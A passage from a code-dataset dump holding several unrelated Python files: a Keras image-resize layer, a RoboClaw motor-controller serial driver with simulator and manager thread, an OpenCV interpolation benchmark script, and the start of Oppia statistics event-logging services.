`image_data_format` value found in your\n Keras config file at `~/.keras/keras.json`.\n If you never set it, then it will be \"channels_last\".\n\n # Input shape\n - If `data_format='channels_last'`:\n 4D tensor with shape:\n `(batch_size, rows, cols, channels)`\n - If `data_format='channels_first'`:\n 4D tensor with shape:\n `(batch_size, channels, rows, cols)`\n\n # Output shape\n - If `data_format='channels_last'`:\n 4D tensor with shape:\n `(batch_size, pooled_rows, pooled_cols, channels)`\n - If `data_format='channels_first'`:\n 4D tensor with shape:\n `(batch_size, channels, pooled_rows, pooled_cols)`\n \"\"\"\n def __init__(self, output_dim=(1, 1), data_format=None, **kwargs):\n super(ResizeImages, self).__init__(**kwargs)\n normalized_data_format = K.normalize_data_format(data_format)\n self.output_dim = conv_utils.normalize_tuple(output_dim, 2, 'output_dim')\n self.data_format = normalized_data_format\n self.input_spec = InputSpec(ndim=4)\n\n def build(self, input_shape):\n self.input_spec = [InputSpec(shape=input_shape)]\n\n def compute_output_shape(self, input_shape):\n if self.data_format == 'channels_first':\n return (input_shape[0], input_shape[1], self.output_dim[0], self.output_dim[1])\n elif self.data_format == 'channels_last':\n return (input_shape[0], self.output_dim[0], self.output_dim[1], input_shape[3])\n\n def _resize_fun(self, inputs, data_format):\n try:\n assert keras.backend.backend() == 'tensorflow'\n assert self.data_format == 'channels_last'\n except AssertionError:\n print(\"Only tensorflow backend is supported for the resize layer and accordingly 'channels_last' ordering\")\n output = tfi.resize_images(inputs, self.output_dim)\n return output\n\n def call(self, inputs):\n output = self._resize_fun(inputs=inputs, data_format=self.data_format)\n return output\n\n def get_config(self):\n config = {'output_dim': self.output_dim,\n 'data_format': self.data_format}\n base_config = super(ResizeImages, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n","sub_path":"src/CustomLayers.py","file_name":"CustomLayers.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"244955153","text":"\"\"\"Factory demo code from Orion Robotics, wrapped into classes.\"\"\"\nimport logging\nimport numpy\nimport pdb\nimport serial\nimport struct\nimport threading\nimport time\n\nimport roboclaw as rc\n\n# empirically measured\nTICKS_PER_REV = 253\nMAX_TICKS_PER_SECOND = 3336\n\nclass RoboClaw(object):\n \"\"\"Convenience class for talking to an Orion Robotics RoboClaw\n motor controller. Note: this code is just the factory demo\n code, rearranged and put into a class.\"\"\"\n\n def __init__(self, port):\n \"\"\"Open a serial port for talking to the RoboClaw motor controller,\n and initialize the controller.\n\n Args:\n port (string): the name of a device entry like '/dev/ttyACM0' or\n '/dev/ttyUSB0'.\n\n baudrate (int): for V4 (USB) Roboclaws, this value is ignored. For\n earlier models,this value should correspond to the switch settings\n on the board.\n\n max_ticks_per_second (int): ticks per second from the encoders when\n the motors are running at 100% duty cycle. This is empirically\n determined. Roboclaw needs this at start to report correct \"QPPS\".\n See the Roboclaw manual.\n\n Raises:\n IOError, if we can't open the indicated port for some reason.\n \"\"\"\n self.checksum = 0\n self.port = serial.Serial(port, timeout=0.5)\n #self.accel = accel\n #(p, i, d, q) = self.readM1pidq()\n #self.SetM1pidq(p, i, d, max_ticks_per_second)\n #(p, i, d, q) = self.readM2pidq()\n #self.SetM2pidq(p, i, d, max_ticks_per_second)\n def __del__(self):\n self.port.close()\n\n def sendcommand(self, address, command):\n self.checksum = address\n self.port.write(chr(address))\n self.checksum += command\n self.port.write(chr(command))\n return\n\n def readbyte(self):\n val = struct.unpack('>B', self.port.read(1))\n self.checksum += val[0]\n return val[0]\n\n def readsbyte(self):\n val = struct.unpack('>b', self.port.read(1))\n self.checksum += val[0]\n return val[0]\n\n def readword(self):\n val = struct.unpack('>H', self.port.read(2))\n self.checksum += (val[0] & 0xFF)\n self.checksum += (val[0] >> 8) & 0xFF\n return val[0]\n\n def readsword(self):\n val = struct.unpack('>h', self.port.read(2))\n self.checksum += val[0]\n self.checksum += (val[0] >> 8) & 0xFF\n return val[0]\n\n def readlong(self):\n val = struct.unpack('>L', self.port.read(4))\n self.checksum += val[0]\n self.checksum += (val[0] >> 8) & 0xFF\n self.checksum += (val[0] >> 16) & 0xFF\n self.checksum += (val[0] >> 24) & 0xFF\n return val[0]\n\n def readslong(self):\n val = struct.unpack('>l', self.port.read(4))\n self.checksum += val[0]\n self.checksum += (val[0] >> 8) & 0xFF\n self.checksum += (val[0] >> 16) & 0xFF\n self.checksum += (val[0] >> 24) & 0xFF\n return val[0]\n\n def writebyte(self, val):\n self.checksum += val\n return self.port.write(struct.pack('>B', val))\n\n def writesbyte(self, val):\n self.checksum += val\n return self.port.write(struct.pack('>b', val))\n\n def writeword(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n return self.port.write(struct.pack('>H', val))\n\n def writesword(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n return self.port.write(struct.pack('>h', val))\n\n def writelong(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n self.checksum += (val >> 16) & 0xFF\n self.checksum += (val >> 24) & 0xFF\n return self.port.write(struct.pack('>L', val))\n\n def writeslong(self, val):\n self.checksum += val\n self.checksum += (val >> 8) & 0xFF\n self.checksum += (val >> 16) & 0xFF\n self.checksum += (val >> 24) & 0xFF\n return self.port.write(struct.pack('>l', val))\n\n def M1Forward(self, val):\n self.sendcommand(128, 0)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def M1Backward(self, val):\n self.sendcommand(128, 1)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMinMainBattery(self, val):\n self.sendcommand(128, 2)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMaxMainBattery(self, val):\n self.sendcommand(128, 3)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def M2Forward(self, val):\n self.sendcommand(128, 4)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def M2Backward(self, val):\n self.sendcommand(128, 5)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def DriveM1(self, val):\n self.sendcommand(128, 6)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def DriveM2(self, val):\n self.sendcommand(128, 7)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def ForwardMixed(self, val):\n self.sendcommand(128, 8)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def BackwardMixed(self, val):\n self.sendcommand(128, 9)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def RightMixed(self, val):\n self.sendcommand(128, 10)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def LeftMixed(self, val):\n self.sendcommand(128, 11)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def DriveMixed(self, val):\n self.sendcommand(128, 12)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def TurnMixed(self, val):\n self.sendcommand(128, 13)\n self.writebyte(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def readM1encoder(self):\n self.sendcommand(128, 16)\n enc = self.readslong()\n status = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (enc, status)\n return (-1, -1)\n\n def readM2encoder(self):\n self.sendcommand(128, 17)\n enc = self.readslong()\n status = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (enc, status)\n return (-1, -1)\n\n def readM1speed(self):\n self.sendcommand(128, 18)\n enc = self.readslong()\n status = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (enc, status)\n return (-1, -1)\n\n def readM2speed(self):\n self.sendcommand(128, 19)\n enc = self.readslong()\n status = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (enc, status)\n return (-1, -1)\n\n def ResetEncoderCnts(self):\n self.sendcommand(128, 20)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def readversion(self):\n self.sendcommand(128, 21)\n return self.port.read(32)\n\n def readmainbattery(self):\n self.sendcommand(128, 24)\n val = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return val\n return -1\n\n def readlogicbattery(self):\n self.sendcommand(128, 25)\n val = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return val\n return -1\n\n def SetM1pidq(self, p, i, d, qpps):\n self.sendcommand(128, 28)\n self.writelong(d)\n self.writelong(p)\n self.writelong(i)\n self.writelong(qpps)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2pidq(self, p, i, d, qpps):\n self.sendcommand(128, 29)\n self.writelong(d)\n self.writelong(p)\n self.writelong(i)\n self.writelong(qpps)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def readM1instspeed(self):\n self.sendcommand(128, 30)\n enc = self.readslong()\n status = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (enc, status)\n return (-1, -1)\n\n def readM2instspeed(self):\n self.sendcommand(128, 31)\n enc = self.readslong()\n status = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (enc, status)\n return (-1, -1)\n\n def SetM1Duty(self, val):\n self.sendcommand(128, 32)\n writesword(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2Duty(self, val):\n self.sendcommand(128, 33)\n writesword(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedDuty(self, m1, m2):\n self.sendcommand(128, 34)\n writesword(m1)\n writesword(m2)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM1Speed(self, val):\n self.sendcommand(128, 35)\n self.writeslong(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2Speed(self, val):\n self.sendcommand(128, 36)\n self.writeslong(val)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedSpeed(self, m1, m2):\n self.sendcommand(128, 37)\n self.writeslong(m1)\n self.writeslong(m2)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM1SpeedAccel(self, accel, speed):\n self.sendcommand(128, 38)\n self.writelong(accel)\n self.writeslong(speed)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2SpeedAccel(self, accel, speed):\n self.sendcommand(128, 39)\n self.writelong(accel)\n self.writeslong(speed)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedSpeedAccel(self, accel, speed1, speed2):\n self.sendcommand(128, 40)\n self.writelong(accel)\n self.writeslong(speed1)\n self.writeslong(speed2)\n self.writebyte(self.checksum & 0x7F)\n return\n def SetM1SpeedDistance(self, speed, distance, buffer):\n self.sendcommand(128, 41)\n self.writeslong(speed)\n self.writelong(distance)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2SpeedDistance(self, speed, distance, buffer):\n self.sendcommand(128, 42)\n self.writeslong(speed)\n self.writelong(distance)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedSpeedDistance(self, speed1, distance1, speed2, distance2, buffer):\n self.sendcommand(128, 43)\n self.writeslong(speed1)\n self.writelong(distance1)\n self.writeslong(speed2)\n self.writelong(distance2)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM1SpeedAccelDistance(self, accel, speed, distance, buffer):\n self.sendcommand(128, 44)\n self.writelong(accel)\n self.writeslong(speed)\n self.writelong(distance)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2SpeedAccelDistance(self, accel, speed, distance, buffer):\n self.sendcommand(128, 45)\n self.writelong(accel)\n self.writeslong(speed)\n self.writelong(distance)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedSpeedAccelDistance(self, accel, speed1, distance1, speed2, distance2, buffer):\n self.sendcommand(128, 46)\n self.writelong(accel)\n self.writeslong(speed1)\n self.writelong(distance1)\n self.writeslong(speed2)\n self.writelong(distance2)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def readbuffercnts(self):\n self.sendcommand(128, 47)\n buffer1 = self.readbyte()\n buffer2 = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (buffer1, buffer2)\n return (-1, -1)\n\n def readcurrents(self):\n self.sendcommand(128, 49)\n motor1 = self.readword()\n motor2 = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (motor1, motor2)\n return (-1, -1)\n\n def SetMixedSpeedIAccel(self, accel1, speed1, accel2, speed2):\n self.sendcommand(128, 50)\n self.writelong(accel1)\n self.writeslong(speed1)\n self.writelong(accel2)\n self.writeslong(speed2)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedSpeedIAccelDistance(self, accel1, speed1, distance1, accel2, speed2, distance2, buffer):\n self.sendcommand(128, 51)\n self.writelong(accel1)\n self.writeslong(speed1)\n self.writelong(distance1)\n self.writelong(accel2)\n self.writeslong(speed2)\n self.writelong(distance2)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM1DutyAccel(self, accel, duty):\n self.sendcommand(128, 52)\n writesword(duty)\n writeword(accel)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2DutyAccel(self, accel, duty):\n self.sendcommand(128, 53)\n writesword(duty)\n writeword(accel)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedDutyAccel(self, accel1, duty1, accel2, duty2):\n self.sendcommand(128, 54)\n writesword(duty1)\n writeword(accel1)\n writesword(duty2)\n writeword(accel2)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def readM1pidq(self):\n self.sendcommand(128, 55)\n p = self.readlong()\n i = self.readlong()\n d = self.readlong()\n qpps = self.readlong()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (p, i, d, qpps)\n return (-1, -1, -1, -1)\n\n def readM2pidq(self):\n self.sendcommand(128, 56)\n p = self.readlong()\n i = self.readlong()\n d = self.readlong()\n qpps = self.readlong()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (p, i, d, qpps)\n return (-1, -1, -1, -1)\n\n def readmainbatterysettings(self):\n self.sendcommand(128, 59)\n min = self.readword()\n max = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (min, max)\n return (-1, -1)\n\n def readlogicbatterysettings(self):\n self.sendcommand(128, 60)\n min = self.readword()\n max = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (min, max)\n return (-1, -1)\n\n def SetM1PositionConstants(self, kp, ki, kd, kimax, deadzone, min, max):\n self.sendcommand(128, 61)\n self.writelong(kd)\n self.writelong(kp)\n self.writelong(ki)\n self.writelong(kimax)\n self.writelong(min)\n self.writelong(max)\n return\n\n def SetM2PositionConstants(self, kp, ki, kd, kimax, deadzone, min, max):\n self.sendcommand(128, 62)\n self.writelong(kd)\n self.writelong(kp)\n self.writelong(ki)\n self.writelong(kimax)\n self.writelong(min)\n self.writelong(max)\n return\n\n def readM1PositionConstants(self):\n self.sendcommand(128, 63)\n p = self.readlong()\n i = self.readlong()\n d = self.readlong()\n imax = self.readlong()\n deadzone = self.readlong()\n min = self.readlong()\n max = self.readlong()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (p, i, d, imax, deadzone, min, max)\n return (-1, -1, -1, -1, -1, -1, -1)\n\n def readM2PositionConstants(self):\n self.sendcommand(128, 64)\n p = self.readlong()\n i = self.readlong()\n d = self.readlong()\n imax = self.readlong()\n deadzone = self.readlong()\n min = self.readlong()\n max = self.readlong()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return (p, i, d, imax, deadzone, min, max)\n return (-1, -1, -1, -1, -1, -1, -1)\n\n def SetM1SpeedAccelDeccelPosition(self, accel, speed, deccel, position, buffer):\n self.sendcommand(128, 65)\n self.writelong(accel)\n self.writelong(speed)\n self.writelong(deccel)\n self.writelong(position)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetM2SpeedAccelDeccelPosition(self, accel, speed, deccel, position, buffer):\n self.sendcommand(128, 66)\n self.writelong(accel)\n self.writelong(speed)\n self.writelong(deccel)\n self.writelong(position)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def SetMixedSpeedAccelDeccelPosition(self, accel1, speed1, deccel1, position1, accel2, speed2, deccel2, position2,\n buffer):\n self.sendcommand(128, 67)\n self.writelong(accel1)\n self.writelong(speed1)\n self.writelong(deccel1)\n self.writelong(position1)\n self.writelong(accel2)\n self.writelong(speed2)\n self.writelong(deccel2)\n self.writelong(position2)\n self.writebyte(buffer)\n self.writebyte(self.checksum & 0x7F)\n return\n\n def readtemperature(self):\n self.sendcommand(128, 82)\n val = self.readword()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return val\n return -1\n\n def readerrorstate(self):\n self.sendcommand(128, 90)\n val = self.readbyte()\n crc = self.checksum & 0x7F\n if crc == self.readbyte():\n return val\n return -1\n\nclass RoboClawSim(object):\n \"\"\"\n Simulator class that fakes minimal RoboClaw functionality\n \"\"\"\n def __init__(self, port, baudrate, accel, max_ticks_per_second):\n self.M1Speed = 0\n self.M2Speed = 0\n\n self.M1EncoderCnts = 0\n self.M2EncoderCnts = 0\n\n def SetMixedSpeedAccel(self, accel, speed1, speed2):\n self.M1Speed = speed1\n self.M2Speed = speed2\n\n def readM1speed(self):\n return (self.M1Speed, 0)\n \n def readM2speed(self):\n return (self.M2Speed, 0)\n \n def readM1instspeed(self):\n return (int(self.M1Speed / 125.0), 0)\n\n def readM2instspeed(self):\n return (int(self.M2Speed / 125.0), 0)\n\n def SetM1pidq(self, p, i, d, qpps):\n pass\n\n def SetM2pidq(self, p, i, d, qpps):\n pass\n\n def readM1pidq(self):\n return (-1, -1, -1, -1)\n\n def readM2pidq(self):\n return (-1, -1, -1, -1)\n\n def readversion(self):\n return \"RoboClawSim version x.x\"\n\n def ResetEncoderCnts(self):\n self.M1EncoderCnts = 0\n self.M2EncoderCnts = 0\n\nclass RoboClawManager(threading.Thread):\n \"\"\"Manages one or more Roboclaw controllers, continuously polling them for\n instantaneous speed. Readings are pushed into an output queue. Meanwhile,\n RoboClawManager watches a command queue for incoming motor control\n commands (wheel angular velocities). When a wheel velocity command arrives,\n it is converted to four wheel speed commands in encoder ticks per second.\n \"\"\"\n def __init__(self, ports, baudrate, accel, max_ticks_per_second,\n ticks_per_rev, poll_rate_hz, cmd_input_queue, output_queue,\n simulate=False):\n \"\"\"\n Initialize the RoboClawManager.\n :param ports: a tuple of serial port init strings. ports[0] is the\n front two wheels, ports[1] is the rear.\n :param baudrate: for V4 (USB) Roboclaws, this value is ignored. For\n earlier models,this value should correspond to the switch settings\n on the board.\n :param max_ticks_per_second: ticks per second from the encoders when\n the motors are running at 100% duty cycle. This is empirically\n determined. Roboclaw needs this at start to report correct \"QPPS\".\n See the Roboclaw manual.\n :param poll_rate_hz: rate at which the work thread runs.\n RoboClawManager will periocially poll the RoboClaws for wheel\n speeds, and look for and dispatch incoming speed change commands.\n :param accel: the rate at which the Roboclaw controllers will\n accelerate the wheels to a commanded speed, in counts/s/s.\n :param cmd_input_queue: this queue will be checked every\n 1 / poll_interval_s seconds for incoming speed change commands.\n :param output_queue: every 1 / poll_rate_hz seconds, RoboClawManager\n polls the Roboclaw controllers for the current wheel speeds, pack\n the speeds into a tuple, and put them into the output_queue.\n \"\"\"\n self.ports = ports\n self.baudrate = baudrate\n self.accel = accel\n self.max_ticks_per_second = max_ticks_per_second\n self.ticks_per_rev = ticks_per_rev\n self.poll_rate_hz = poll_rate_hz\n self.cmd_queue = cmd_input_queue\n self.output_queue = output_queue\n self.simulate = simulate\n self.quit = False\n if simulate:\n self.front = rc.RoboClawSim(ports[0], baudrate, accel,\n max_ticks_per_second)\n self.rear = rc.RoboClawSim(ports[1], baudrate, accel,\n max_ticks_per_second)\n else:\n self.front = rc.RoboClaw(ports[0], baudrate, accel,\n max_ticks_per_second)\n self.rear = rc.RoboClaw(ports[1], baudrate, accel,\n max_ticks_per_second)\n self.front.SetMixedSpeedAccel(0, 0, 0)\n self.rear.SetMixedSpeedAccel(0, 0, 0)\n threading.Thread.__init__(self)\n\n def run(self):\n \"\"\"Ask the controller for our current speed and output it,\n unless we've got an incoming move command, in which\n we'll send the command and output our last speeds.\"\"\"\n w_prev = (0.0, 0.0, 0.0, 0.0)\n w_out = (0.0, 0.0, 0.0, 0.0)\n while((self.quit == False)):\n w_in = (0.0, 0.0, 0.0, 0.0)\n if 0 != len(self.cmd_queue):\n w_in = self.cmd_queue.popleft()\n self.set_wheel_velocities(w_in)\n w_out = w_prev\n else:\n w_out = self.get_wheel_velocities()\n self.output_queue.append(w_out)\n w_prev = w_out\n time.sleep(1.0 / self.poll_rate_hz)\n logging.info(\"RoboClawManager: exiting.\")\n\n def set_wheel_velocities(self, w):\n \"\"\"Set wheel velocities received in this order: lf, lr, rr, rf.\"\"\"\n n0 = self.radians_to_ticks(w[0])\n n1 = self.radians_to_ticks(w[1])\n n2 = self.radians_to_ticks(w[2])\n n3 = self.radians_to_ticks(w[3])\n\n self.front.SetMixedSpeedAccel(self.accel, int(n0), int(n3))\n self.rear.SetMixedSpeedAccel(self.accel, int(n1), int(n2))\n\n def get_wheel_velocities(self):\n \"\"\" Ask the Roboclaw controller for the current instantaneous speeds,\n in ticks/second. The speeds returned from the Roboclaws are in\n encoder ticks.\n \"\"\"\n w = [0.0, 0.0, 0.0, 0.0]\n w[0] = self.ticks_to_radians(self.front.readM1speed()[0])\n w[1] = self.ticks_to_radians(self.rear.readM1speed()[0])\n time.sleep(1.0/ self.poll_rate_hz)\n w[2] = self.ticks_to_radians(self.rear.readM2speed()[0])\n w[3] = self.ticks_to_radians(self.front.readM2speed()[0]) \n return tuple(w)\n\n def ticks_to_radians(self, n):\n theta = n * (2.0 * numpy.pi) / TICKS_PER_REV\n return theta\n\n def radians_to_ticks(self, theta):\n n = theta * TICKS_PER_REV / (2.0 * numpy.pi)\n return n\n\n","sub_path":"src/ros/src/waist_control/nodes/roboclaw_waist.py","file_name":"roboclaw_waist.py","file_ext":"py","file_size_in_byte":24545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"271788411","text":"import utils\nimport params\nimport cv2 as cv\nimport pdb\nimport numpy as np\n\ndef resize(downscaled_image, original_image, interpolation_method): \n \n standard_resize = utils.resize_height_width_3d_image_standard(downscaled_image, int(downscaled_image.shape[1]), int(downscaled_image.shape[2]*scale), interpolation_method=interpolation_method)\n \n if use_original: \n # standard_resize = np.transpose(standard_resize, [2, 0, 1, 3]) \n standard_resize = np.transpose(standard_resize, [2, 1, 0, 3]) \n \n ssim_standard, psnr_standard = utils.compute_ssim_psnr_batch(standard_resize, original_image)\n\n return ssim_standard, psnr_standard \n \ndef read_images(test_path):\n\n if use_original:\n add_to_path = 'original'\n else:\n add_to_path = 'transposed'\n \n test_images_gt = utils.read_all_directory_images_from_directory_test(test_path, add_to_path=add_to_path)\n test_images = utils.read_all_directory_images_from_directory_test(test_path, add_to_path='input_2_1_x%d' % scale)\n \n return test_images_gt, test_images\n \ndef compute_performance_indeces(test_images_gt, test_images, interpolation_method): \n num_images = 0 \n ssim_cnn_sum = 0; psnr_cnn_sum = 0; ssim_standard_sum = 0; psnr_standard_sum = 0; \n \n for index in range(len(test_images)): \n ssim_standard, psnr_standard = resize(test_images[index], test_images_gt[index], interpolation_method) \n ssim_standard_sum += ssim_standard; psnr_standard_sum += psnr_standard \n num_images += test_images_gt[index].shape[0]\n \n \n return psnr_standard_sum/num_images, ssim_standard_sum/num_images \n \ninterpolation_methods= {'INTER_LINEAR': cv.INTER_LINEAR,\n 'INTER_CUBIC': cv.INTER_CUBIC,\n 'INTER_LANCZOS4': cv.INTER_LANCZOS4,\n 'INTER_NEAREST': cv.INTER_NEAREST}\n \ntest_path = './data/test' \nscale = 4\nuse_original = True\ntest_images_gt, test_images = read_images(test_path)\n\nfor interpolation_method in interpolation_methods.keys():\n psnr, ssim = compute_performance_indeces(test_images_gt, test_images, interpolation_methods[interpolation_method])\n print('interpolation method %s has ssim %f psnr %f' % (interpolation_method, ssim, psnr))\n \n# tranposed images x2\n# interpolation method INTER_LINEAR has ssim 0.864469 psnr 36.881867\n# interpolation method INTER_NEAREST has ssim 0.875036 psnr 37.078668\n# interpolation method INTER_CUBIC has ssim 0.885053 psnr 37.163100\n# interpolation method INTER_LANCZOS4 has ssim 0.888183 psnr 37.231696\n\n# original images x2\n# interpolation method INTER_NEAREST has ssim 0.903308 psnr 34.100390\n# interpolation method INTER_LINEAR has ssim 0.897913 psnr 33.909730\n# interpolation method INTER_LANCZOS4 has ssim 0.912667 psnr 34.280864\n# interpolation method INTER_CUBIC has ssim 0.910502 psnr 34.196829\n \n# x4 \n# interpolation method INTER_LINEAR has ssim 0.812111 psnr 26.742810 \n# interpolation method INTER_CUBIC has ssim 0.824901 psnr 27.201903 \n# interpolation method INTER_NEAREST has ssim 0.810961 psnr 26.230704 \n# interpolation method INTER_LANCZOS4 has ssim 0.826650 psnr 27.285459\n ","sub_path":"cnn/D-resize/standard_resize_D.py","file_name":"standard_resize_D.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"466215984","text":"# coding: utf-8\n#\n# Copyright 2013 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Services for Oppia statistics.\"\"\"\n\n__author__ = 'Sean Lip'\n\nimport collections\nimport utils\n\nfrom oppia.apps.exploration.domain import Exploration\nimport oppia.apps.exploration.services as exp_services\nfrom oppia.apps.statistics.models import Counter\nfrom oppia.apps.statistics.models import Journal\n\n\nIMPROVE_TYPE_DEFAULT = 'default'\nIMPROVE_TYPE_INCOMPLETE = 'incomplete'\n\nSTATS_ENUMS = utils.create_enum(\n 'exploration_visited', 'rule_hit', 'exploration_completed',\n 'feedback_submitted', 'state_hit')\n\n\ndef create_rule_name(rule):\n name = rule.name\n for key in rule.inputs:\n left_paren = name.index('(')\n name = name[0:left_paren] + name[left_paren:].replace(\n key, utils.to_ascii(rule.inputs[key]))\n return name\n\n\ndef get_event_id(event_name, eid):\n if event_name == STATS_ENUMS.exploration_visited:\n return 'e.%s' % eid\n if event_name == STATS_ENUMS.rule_hit:\n return 'default.%s' % eid\n if event_name == STATS_ENUMS.exploration_completed:\n return 'c.%s' % eid\n if event_name == STATS_ENUMS.feedback_submitted:\n return 'f.%s' % eid\n if event_name == STATS_ENUMS.state_hit:\n return 's.%s' % eid\n\n\nclass EventHandler(object):\n \"\"\"Records events.\"\"\"\n\n @classmethod\n def _record_event(cls, event_name, eid, extra_info=''):\n \"\"\"Updates statistics based on recorded events.\"\"\"\n\n event_id = get_event_id(event_name, eid)\n\n if event_name == STATS_ENUMS.exploration_visited:\n cls._inc(event_id)\n if event_name == STATS_ENUMS.rule_hit:\n cls._add(event_id, unicode(extra_info))\n if event_name == STATS_ENUMS.exploration_completed:\n cls._inc(event_id)\n if event_name == STATS_ENUMS.feedback_submitted:\n cls._add(event_id, unicode(extra_info))\n if event_name == STATS_ENUMS.state_hit:\n cls._inc(event_id)\n\n @classmethod\n def record_rule_hit(cls, exploration_id, state_id, rule, extra_info=''):\n \"\"\"Records an event when an answer triggers the default rule.\"\"\"\n cls._record_event(\n STATS_ENUMS.rule_hit, '%s.%s.%s' % (\n exploration_id, state_id, create_rule_name(rule)),\n extra_info)\n\n @classmethod\n def record_exploration_visited(cls, exploration_id):\n \"\"\"Records an event when an exploration is first loaded.\"\"\"\n cls._record_event(STATS_ENUMS.exploration_visited, exploration_id)\n\n @classmethod\n def record_exploration_completed(cls, exploration_id):\n \"\"\"Records an event when an exploration is completed.\"\"\"\n cls._record_event(STATS_ENUMS.exploration_completed, exploration_id)\n\n @classmethod\n def record_feedback_submitted(cls, url, feedback):\n \"\"\"Records an event where feedback was submitted via the web UI.\"\"\"\n cls._record_event(\n STATS_ENUMS.feedback_submitted, url, extra_info=feedback\n )\n\n @classmethod\n def record_state_hit(cls, exploration_id, state_id):\n \"\"\"Record an event when a state is loaded.\"\"\"\n cls._record_event(STATS_ENUMS.state_hit, '%s.%s' %\n (exploration_id, state_id))\n\n @classmethod\n def _inc(cls, event_id):\n \"\"\"Increments the counter corresponding to an event id.\"\"\"\n counter = Counter.get(event_id, strict=False)\n if not counter:\n counter = Counter(id=event_id)\n counter.value += 1\n counter.put()\n\n @classmethod\n def _add(cls, event_id, value):\n \"\"\"Adds to the list corresponding to an event id.\"\"\"\n journal = Journal.get(event_id, strict=False)\n if not journal:\n journal = Journal(id=event_id)\n journal.values.append(value)\n journal.put()\n\n\ndef get_exploration_stats(event_name, exploration_id):\n \"\"\"Retrieves statistics for the given event name and exploration id.\"\"\"\n\n if event_name == STATS_ENUMS.exploration_visited:\n event_id = get_event_id(event_name, exploration_id)\n return Counter.get_value_by_id(event_id)\n\n if event_name == STATS_ENUMS.exploration_completed:\n event_id = get_event_id(event_name, exploration_id)\n return Counter.get_value_by_id(event_id)\n\n if event_name == STATS_ENUMS.rule_hit:\n result = {}\n\n exploration = Exploration.get(exploration_id)\n for state_id in 